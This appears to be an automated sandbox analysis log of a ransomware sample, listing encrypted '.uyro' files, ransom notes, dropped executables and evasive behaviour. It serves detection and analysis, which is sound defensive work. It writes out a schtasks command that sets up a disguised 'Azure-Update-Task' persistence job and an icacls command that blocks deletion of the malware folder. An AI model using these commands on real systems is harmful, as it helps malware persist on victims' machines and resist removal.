Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\yo-NG\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sr-Cyrl-RS\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\GenericProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\si-LK\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\WimProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ha-Latn-NG\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CompatProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sr-Cyrl-BA\FileSync.LocalizedResources.dll.mui	Jump to dropped file

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\_readme.txt			Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\_readme.txt			Jump to behavior

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe

Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 1_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,

1_2_00481920

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe TID: 2852	Thread sleep time: -700000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 4684	Thread sleep count: 346 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 4684	Thread sleep time: -77850s >= -30000s
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 348	Thread sleep count: 593 > 30

Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_0-6211
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_1-34890

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Thread delayed: delay time: 700000

Jump to behavior

Source: C:\Windows\System32\wbem\WMIADAP.exe

Window / User API: threadDelayed 593

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sd-Arab-PK\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\VhdProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\LogProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\MsiProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pt-BR\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\eu\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sv\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismCore.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gl\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sr-Latn-RS\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tr\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CompatProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismCore.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\quc\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveStandaloneUpdater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IBSProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\vi\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mk\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\quz-PE\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\te\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IBSProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fi\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sw\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\OfflineSetupProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileCoAuth.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDrive.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\de\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mr\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FolderProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pt-PT\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nl\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileSyncHelper.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\ProvProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FolderProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kn\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sq\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\id\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bn-BD\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fr\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\SysprepProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ne-NP\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\cy-GB\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hy\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ti\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\uk\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\CR_4BAC1.tmp\setup.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bs-Latn-BA\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en-US\msipc.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\SmiProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ms\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nn-NO\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveUpdaterService.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ka\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ca-Es-VALENCIA\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lt\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gd\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Application Data\Application Data\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pa\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mi-NZ\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ru\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\ImagingProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\am-ET\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-CN\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\OSProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\az-Latn-AZ\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tk-TM\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hr\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileSyncConfig.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\TransmogProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\he\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AssocProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nb-NO\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ky\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\km-KH\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mt-MT\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveStandaloneUpdater.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ro\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\tmpCDDA.tmp.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ml-IN\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sl\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ta\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismProv.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ja\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kok\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\be\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IntlProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveSetup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\ImagingProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\is\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ca\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nso-ZA\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tg\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mn\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pl\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmpCDDA.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lb-LU\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileSyncHelper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\SetupPlatformProvider.dll.mui	Jump to dropped file
